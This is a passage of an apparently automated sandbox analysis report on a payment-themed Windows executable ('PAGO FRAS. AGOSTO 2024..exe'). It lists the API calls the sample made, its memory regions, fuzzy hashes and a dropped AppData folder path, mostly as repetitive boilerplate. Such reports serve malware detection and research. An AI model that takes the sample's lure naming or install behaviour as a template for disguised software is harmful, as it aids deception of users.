                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite
                                                                              • String ID:
                                                                              • API String ID: 3934441357-0
                                                                              • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                              • Instruction ID: 4baa6dbb94b5aed14ede1987b2b874979685841cdf923a54f3be7db8892ddb6c
                                                                              • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                              • Instruction Fuzzy Hash: 65E0EC3265425EAFDF109E659C40EEB7BACEB053A0F008933F925E2150D231E821DFA9
                                                                              APIs
                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004030C4,00000000,00000000,00402EEE,000000FF,00000004,00000000,00000000,00000000), ref: 00405A2E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID:
                                                                              • API String ID: 2738559852-0
                                                                              • Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                              • Instruction ID: b949637607fe9c5fc006a161b6664aa16a088e5f06d71f7b71a40b2ab1c7b417
                                                                              • Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                              • Instruction Fuzzy Hash: 80E0EC3261425AABDF109E959C40FEB7B6CEF45360F048532F915E6590E231E8219FA9
                                                                              APIs
                                                                              • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              • Opcode ID: 458389e1991e1a908742f437881805813113f4244f4ccb02aaaba390b89fa544
                                                                              • Instruction ID: 6a3e57155666377f6ae5a5c5a230e2cf9c2db004969d7e98ca1d37c028e4fb03
                                                                              • Opcode Fuzzy Hash: 458389e1991e1a908742f437881805813113f4244f4ccb02aaaba390b89fa544
                                                                              • Instruction Fuzzy Hash: A2D05B33B14100DBDB10EBE5DF08A9D73A5BB60329B308637D201F21D1D7B9C9559B29
                                                                              APIs
                                                                              • SendMessageA.USER32(0001048C,00000000,00000000,00000000), ref: 00403F72
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
                                                                              • Instruction ID: 75b6af85c7b4550c46e72781509667ec0f8baecc0ee27a44b040c7e6c7b1aa08
                                                                              • Opcode Fuzzy Hash: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
                                                                              • Instruction Fuzzy Hash: 1FC04875B88201BAEE218B609D4AF167BA8AB60B42F258429B211E60E0C674F410DA2D
                                                                              APIs
                                                                              • SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
                                                                              • Instruction ID: 9ba269cb94747afcd00db45940492297b6475019a1e9eeef8f710f25602b24aa
                                                                              • Opcode Fuzzy Hash: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
                                                                              • Instruction Fuzzy Hash: 71B01235684200BBFE325B00DE0DF457E62F768701F008034B300250F1C7B200A2DB29
                                                                              APIs
                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,?), ref: 004030D5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: FilePointer
                                                                              • String ID:
                                                                              • API String ID: 973152223-0
                                                                              • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                              • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                              • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                              • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,00000403), ref: 004050E5
                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004050F4
                                                                              • GetClientRect.USER32(?,?), ref: 00405131
                                                                              • GetSystemMetrics.USER32(00000002), ref: 00405138
                                                                              • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405159
                                                                              • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040516A
                                                                              • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040517D
                                                                              • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040518B
                                                                              • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040519E
                                                                              • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004051C0
                                                                              • ShowWindow.USER32(?,00000008), ref: 004051D4
                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004051F5
                                                                              • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405205
                                                                              • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040521E
                                                                              • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040522A
                                                                              • GetDlgItem.USER32(?,000003F8), ref: 00405103
                                                                                • Part of subcall function 00403F49: SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57
                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405246
                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0000501A,00000000), ref: 00405254
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040525B
                                                                              • ShowWindow.USER32(00000000), ref: 0040527E
                                                                              • ShowWindow.USER32(?,00000008), ref: 00405285
                                                                              • ShowWindow.USER32(00000008), ref: 004052CB
                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FF
                                                                              • CreatePopupMenu.USER32 ref: 00405310
                                                                              • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405325
                                                                              • GetWindowRect.USER32(?,000000FF), ref: 00405345
                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040535E
                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040539A
                                                                              • OpenClipboard.USER32(00000000), ref: 004053AA
                                                                              • EmptyClipboard.USER32 ref: 004053B0
                                                                              • GlobalAlloc.KERNEL32(00000042,?), ref: 004053B9
                                                                              • GlobalLock.KERNEL32(00000000), ref: 004053C3
                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053D7
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004053F0
                                                                              • SetClipboardData.USER32(00000001,00000000), ref: 004053FB
                                                                              • CloseClipboard.USER32 ref: 00405401
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                              • String ID:
                                                                              • API String ID: 590372296-0
                                                                              • Opcode ID: 3d83c7054a3b30a9ea95d535bbc07a084d735a6ee6b89b99bed3655396955496
                                                                              • Instruction ID: a6ce54ef4cbaee69b9623da841507b5c48c0df4ae21fd636639bbbe11a9743ae
                                                                              • Opcode Fuzzy Hash: 3d83c7054a3b30a9ea95d535bbc07a084d735a6ee6b89b99bed3655396955496
                                                                              • Instruction Fuzzy Hash: 8EA13871900208BFEB119FA0DD89AAE7F79FB08355F10407AFA01BA1A0C7755E51DF69
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003FB), ref: 004043A1
                                                                              • SetWindowTextA.USER32(00000000,?), ref: 004043CB
                                                                              • SHBrowseForFolderA.SHELL32(?,00428C40,?), ref: 0040447C
                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404487
                                                                              • lstrcmpiA.KERNEL32(Space required: ,00429868), ref: 004044B9
                                                                              • lstrcatA.KERNEL32(?,Space required: ), ref: 004044C5
                                                                              • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044D7
                                                                                • Part of subcall function 00405509: GetDlgItemTextA.USER32(?,?,00000400,0040450E), ref: 0040551C
                                                                                • Part of subcall function 00405F9A: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
                                                                                • Part of subcall function 00405F9A: CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                                                • Part of subcall function 00405F9A: CharNextA.USER32(?,"C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
                                                                                • Part of subcall function 00405F9A: CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
                                                                              • GetDiskFreeSpaceA.KERNEL32(00428838,?,?,0000040F,?,00428838,00428838,?,00000001,00428838,?,?,000003FB,?), ref: 00404595
                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B0
                                                                                • Part of subcall function 00404709: lstrlenA.KERNEL32(00429868,00429868,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                                                • Part of subcall function 00404709: wsprintfA.USER32 ref: 004047AF
                                                                                • Part of subcall function 00404709: SetDlgItemTextA.USER32(?,00429868), ref: 004047C2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                              • String ID: A$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$Space required:
                                                                              • API String ID: 2624150263-1533186396
                                                                              • Opcode ID: 92617ce1ab210426147f8d25d609736ba8401d1a6e22c2ed364add3f88eda8c7
                                                                              • Instruction ID: ab5132907fc5b2f665edfad9f17b3ca32a66d27d09768481e079f0ca797b6646
                                                                              • Opcode Fuzzy Hash: 92617ce1ab210426147f8d25d609736ba8401d1a6e22c2ed364add3f88eda8c7
                                                                              • Instruction Fuzzy Hash: 07A194B1900209ABDB11AFA2CC45AAF77B8EF85314F10843BF601B62D1D77C8941CB69
                                                                              APIs
                                                                              • CoCreateInstance.OLE32(00407514,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
                                                                              Strings
                                                                              • C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets, xrefs: 0040211D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharCreateInstanceMultiWide
                                                                              • String ID: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets
                                                                              • API String ID: 123533781-1810565758
                                                                              • Opcode ID: b8ee83f4a2e520ff4dab12eb385b74956a589b44baa30f4280110cf77b52f418
                                                                              • Instruction ID: 202bff00353f62e800299527826cf24c9a9ce8e01df6a73eade79aa1dd8fb932
                                                                              • Opcode Fuzzy Hash: b8ee83f4a2e520ff4dab12eb385b74956a589b44baa30f4280110cf77b52f418
                                                                              • Instruction Fuzzy Hash: 16512775A00208BFCF10DFA4CD88A9DBBB5BF48318F20856AF615EB2D1DA799941CB14
                                                                              APIs
                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: FileFindFirst
                                                                              • String ID:
                                                                              • API String ID: 1974802433-0
                                                                              • Opcode ID: fcbf5a8c9ec62e423337e2823bce3077c6823eab4788f95c2f9143772be47a2f
                                                                              • Instruction ID: 3dffafe4ea1a5cbb8d5ba181f96d08faa62a405c2aca3b81b81ef469795ec413
                                                                              • Opcode Fuzzy Hash: fcbf5a8c9ec62e423337e2823bce3077c6823eab4788f95c2f9143772be47a2f
                                                                              • Instruction Fuzzy Hash: 7AF0A0326081049FE701EBA49949AEEB7789F21324F60057BE241A21C1D7B84985AB3A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
                                                                              • Instruction ID: 52966d4a0c143cd855de3d8d32e2f948802446bd43c2bd9d1e79afe7cfa9a62c
                                                                              • Opcode Fuzzy Hash: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
                                                                              • Instruction Fuzzy Hash: D1E19B71901709DFDB24CF58C890BAABBF5FB44305F15882EE497A72D1D378AA91CB14
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
                                                                              • Instruction ID: 28dd1b742c6822d911ebb92dd847779981f1f79bff0408386317dd500df5852d
                                                                              • Opcode Fuzzy Hash: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
